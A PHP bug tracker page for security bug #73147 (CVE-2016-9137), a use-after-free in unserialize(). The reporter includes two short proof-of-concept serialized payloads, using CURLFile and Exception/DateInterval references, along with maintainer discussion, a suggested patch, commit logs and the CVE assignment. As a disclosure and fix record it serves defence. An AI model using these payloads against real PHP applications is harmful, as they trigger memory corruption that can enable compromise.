php.net |  support |  documentation |  report a bug |  advanced search |  search howto |  statistics |  random bug |  login
Sec Bug #73147 Use After Free in unserialize()
Submitted: 2016-09-23 13:22 UTC Modified: 2016-11-02 09:25 UTC
From: taoguangchen at icloud dot com Assigned: stas (profile)
Status: Closed Package: *General Issues
PHP Version: 5.6.26 OS:
Private report: No CVE-ID: 2016-9137
 [2016-09-23 13:22 UTC] taoguangchen at icloud dot com
Description:
------------
PoC:
```
<?php

$poc = 'a:1:{i:0;O:8:"CURLFile":1:{s:4:"name";R:1;}}';
unserialize($poc);

?>
```


Patches

1 (last revision 2019-09-06 03:41 UTC by 825307076 at qq dot com)
demo17 (last revision 2019-06-06 06:46 UTC by 417177366 at qq dot com)

Add a Patch

Pull Requests

Add a Pull Request

History

AllCommentsChangesGit/SVN commitsRelated reports
 [2016-09-26 02:55 UTC] stas@php.net
-PHP Version: 7.0.11 +PHP Version: 5.6.26 -Assigned To: +Assigned To: stas -CVE-ID: +CVE-ID: needed
 [2016-09-26 02:55 UTC] stas@php.net
The fix is in security repo as 0e6fe3a4c96be2d3e88389a5776f878021b4c59f and in https://gist.github.com/57d761ebfeed962fe7ffb498348f2965

please verify
 [2016-09-26 11:10 UTC] taoguangchen at icloud dot com
The similar bug can be also triggered via Exception::__toString with DateInterval::__wakeup

```
ZEND_METHOD(exception, __toString)
{
...
	zend_update_property_str(base_ce, exception, "string", sizeof("string")-1, str);
```

PoC:
```
<?php

$poc = 'O:9:"Exception":2:{S:17:"\00Exception\00string";R:1;i:0;O:12:"DateInterval":1:{s:4:"days";R:1;}}';
unserialize($poc);

?>
```
 [2016-09-26 19:42 UTC] stas@php.net
Hmmm... I suspect there might be also other places, I'm not sure how to handle this problem in general, as reference allows to overwrite anything, by definition, that's how reference is supposed to work.
 [2016-09-26 22:30 UTC] taoguangchen at icloud dot com
the follow patch can fix this bug:

```
+	zval tmp;
+	ZVAL_STRINGL(&tmp, "string", sizeof("string") - 1);
+	Z_OBJ_HANDLER_P(exception, unset_property)(exception, &tmp, NULL);
+	zval_ptr_dtor(&tmp);
	zend_update_property_str(base_ce, exception, "string", sizeof("string")-1, str);
```
 [2016-09-26 22:35 UTC] stas@php.net
Yes, I know this particular one can be easily fixed. The problem is that every __wakeup that modifies any property would produce the same problem.
 [2016-09-26 22:41 UTC] taoguangchen at icloud dot com
You can handle the DateInterval::__wakeup() like PHP5.
 [2016-10-11 23:45 UTC] stas@php.net
Automatic comment on behalf of stas
Revision: http://git.php.net/?p=php-src.git;a=commit;h=0e6fe3a4c96be2d3e88389a5776f878021b4c59f
Log: Fix bug #73147: Use After Free in PHP7 unserialize()
 [2016-10-11 23:45 UTC] stas@php.net
-Status: Assigned +Status: Closed
 [2016-10-12 15:57 UTC] ab@php.net
Automatic comment on behalf of stas
Revision: http://git.php.net/?p=php-src.git;a=commit;h=f42cbd749cde1f91274c1d03df9024baba141a8f
Log: Fix bug #73147: Use After Free in PHP7 unserialize()
 [2016-10-12 23:26 UTC] ab@php.net
Automatic comment on behalf of stas
Revision: http://git.php.net/?p=php-src.git;a=commit;h=d13507d2e6d7c280888cc9c3cab125b347662e90
Log: Fix bug #73147: Use After Free in PHP7 unserialize()
 [2016-10-12 23:35 UTC] ab@php.net
Automatic comment on behalf of stas
Revision: http://git.php.net/?p=php-src.git;a=commit;h=0e6fe3a4c96be2d3e88389a5776f878021b4c59f
Log: Fix bug #73147: Use After Free in PHP7 unserialize()
 [2016-10-14 01:02 UTC] ab@php.net
Automatic comment on behalf of stas
Revision: http://git.php.net/?p=php-src.git;a=commit;h=54003ab6631b489af54631a548597e8bd599b266
Log: Fix bug #73147: Use After Free in PHP7 unserialize()
 [2016-10-14 02:22 UTC] ab@php.net
Automatic comment on behalf of stas
Revision: http://git.php.net/?p=php-src.git;a=commit;h=f42cbd749cde1f91274c1d03df9024baba141a8f
Log: Fix bug #73147: Use After Free in PHP7 unserialize()
 [2016-10-14 02:23 UTC] ab@php.net
Automatic comment on behalf of stas
Revision: http://git.php.net/?p=php-src.git;a=commit;h=0e6fe3a4c96be2d3e88389a5776f878021b4c59f
Log: Fix bug #73147: Use After Free in PHP7 unserialize()
 [2016-10-14 02:23 UTC] ab@php.net
Automatic comment on behalf of stas
Revision: http://git.php.net/?p=php-src.git;a=commit;h=54003ab6631b489af54631a548597e8bd599b266
Log: Fix bug #73147: Use After Free in PHP7 unserialize()
 [2016-10-14 06:00 UTC] tyrael@php.net
-Summary: Use After Free in PHP7 unserialize() +Summary: Use After Free in unserialize()
 [2016-10-17 10:06 UTC] bwoebi@php.net
Automatic comment on behalf of stas
Revision: http://git.php.net/?p=php-src.git;a=commit;h=54003ab6631b489af54631a548597e8bd599b266
Log: Fix bug #73147: Use After Free in PHP7 unserialize()
 [2016-10-17 10:07 UTC] bwoebi@php.net
Automatic comment on behalf of stas
Revision: http://git.php.net/?p=php-src.git;a=commit;h=f42cbd749cde1f91274c1d03df9024baba141a8f
Log: Fix bug #73147: Use After Free in PHP7 unserialize()
 [2016-10-17 10:07 UTC] bwoebi@php.net
Automatic comment on behalf of stas
Revision: http://git.php.net/?p=php-src.git;a=commit;h=0e6fe3a4c96be2d3e88389a5776f878021b4c59f
Log: Fix bug #73147: Use After Free in PHP7 unserialize()
 [2016-11-02 09:25 UTC] kaplan@php.net
-CVE-ID: needed +CVE-ID: 2016-9137
 [2016-11-02 09:25 UTC] kaplan@php.net
From CVE-assign:
"Use CVE-2016-9137 for the ext/curl/curl_file.c vulnerability that was
fixed in 5.6.27 and 7.0.12.

Use CVE-2016-9138 for the remaining security problem associated with
__wakeup that is still present in 5.6.27 and 7.0.12."
 [2019-06-06 06:46 UTC] 417177366 at qq dot com
The following patch has been added/updated:

Patch Name: demo17
Revision:   1559803573
URL:        https://bugs.php.net/patch-display.php?bug=73147&patch=demo17&revision=1559803573
 [2019-09-06 03:41 UTC] 825307076 at qq dot com
The following patch has been added/updated:

Patch Name: 1
Revision:   1567741285
URL:        https://bugs.php.net/patch-display.php?bug=73147&patch=1&revision=1567741285
 
PHP Copyright © 2001-2019 The PHP Group
All rights reserved.
Last updated: Thu Sep 19 19:01:27 2019 UTC